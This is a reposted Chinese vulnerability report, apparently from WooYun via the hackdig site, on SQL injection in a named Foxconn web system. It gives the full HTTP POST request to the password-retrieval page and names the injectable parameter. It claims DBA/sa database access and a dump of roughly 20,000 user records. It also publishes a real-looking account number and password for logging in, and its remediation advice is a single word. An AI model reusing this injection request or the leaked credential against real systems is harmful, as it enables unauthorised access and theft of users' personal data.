记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

富士康某系统SQL注入(含20W用户信息)

2016-01-21 23:25

富士康超级文胆:http://wendan.foxconn.com/member/login.aspx

20w用户.jpg



POST注入(txt_kw):

POST /member/GetPsw.aspx HTTP/1.1

Accept: text/html, application/xhtml+xml, image/jxr, */*

Referer: http://wendan.foxconn.com/member/GetPsw.aspx

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Content-Length: 239

Host: wendan.foxconn.com

Pragma: no-cache

Cookie: CNZZDATA2610937=cnzz_eid%3D1039442510-1449307100-%26ntime%3D1449307100; ASP.NET_SessionId=jdtc4s2wfj3a3445azuwg5qh



__EVENTTARGET=btnnext&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0MDM4ODk1NTIPZBYCAgEPZBYCAgUPFgIeCWlubmVyaHRtbAUyKiDor7fpgInmi6notKblj7fnsbvlnovvvIzlubbovpPlhaXlr7nlupTkv6Hmga%2FvvIFkZIE2AeG6YY%2BY81Hw1uELduUcmrtR&Drop_type=1&txt_kw=123456

漏洞证明:

数据库类型:

数据库类型.jpg



DBA账号权限:

DBA权限.jpg



sa账号.jpg



数据库:

表.jpg



20557用户

可以爆库:

爆库.jpg



登陆看看(账号3020769 密码 891217):

登陆.jpg



修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2016-0158711

阅读:86308 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“富士康某系统SQL注入(含20W用户信息)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云